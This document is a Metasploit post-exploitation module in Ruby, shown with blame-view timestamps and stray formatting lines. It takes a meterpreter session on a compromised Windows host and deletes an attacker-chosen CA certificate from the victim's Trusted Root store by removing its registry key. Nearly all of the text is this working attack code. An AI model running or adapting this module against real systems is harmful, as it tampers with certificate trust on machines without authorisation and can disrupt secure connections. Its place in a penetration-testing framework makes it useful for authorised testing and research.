2011-10-23 17:17:32 +00:00
|
|
|
##
|
|
|
|
# $Id$
|
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/framework/
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super( update_info( info,
|
2011-10-30 08:20:18 +00:00
|
|
|
'Name' => 'Windows Certificate Authority removal',
|
2011-10-23 17:17:32 +00:00
|
|
|
'Description' => %q{
|
|
|
|
This module allows the attacker to remove an arbitrary CA certificate
|
|
|
|
from the victim's Trusted Root store.},
|
|
|
|
'License' => BSD_LICENSE,
|
|
|
|
'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],
|
|
|
|
'Version' => '$Revision$',
|
|
|
|
'Platform' => [ 'windows' ],
|
|
|
|
'SessionTypes' => [ 'meterpreter' ]
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
2011-10-24 22:43:27 +00:00
|
|
|
OptString.new('CERTID', [ true, 'SHA1 hash of the certificate to remove.', '']),
|
2011-10-23 17:17:32 +00:00
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def run
|
|
|
|
certtoremove = datastore['CERTID']
|
|
|
|
|
|
|
|
open_key = nil
|
|
|
|
key = "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\ROOT\\Certificates"
|
|
|
|
rkey,bkey = client.sys.registry.splitkey(key)
|
|
|
|
|
|
|
|
# Check if the requested cert is actually in the registry to start with
|
|
|
|
open_key = client.sys.registry.open_key(rkey, bkey, KEY_READ + 0x0000)
|
|
|
|
keys = open_key.enum_key
|
|
|
|
|
|
|
|
if (keys.length > 1)
|
|
|
|
if (keys.include?(certtoremove))
|
|
|
|
# We found our target
|
|
|
|
else
|
|
|
|
print_error("The specified CA is not in the registry.")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
else
|
|
|
|
print_error("These are not the CAs you are looking for (i.e. this registry branch is empty)")
|
|
|
|
end
|
|
|
|
|
|
|
|
open_key = client.sys.registry.open_key(rkey, bkey, KEY_WRITE + 0x0000)
|
|
|
|
open_key.delete_key(certtoremove)
|
|
|
|
print_good("Successfully deleted CA: #{certtoremove}")
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|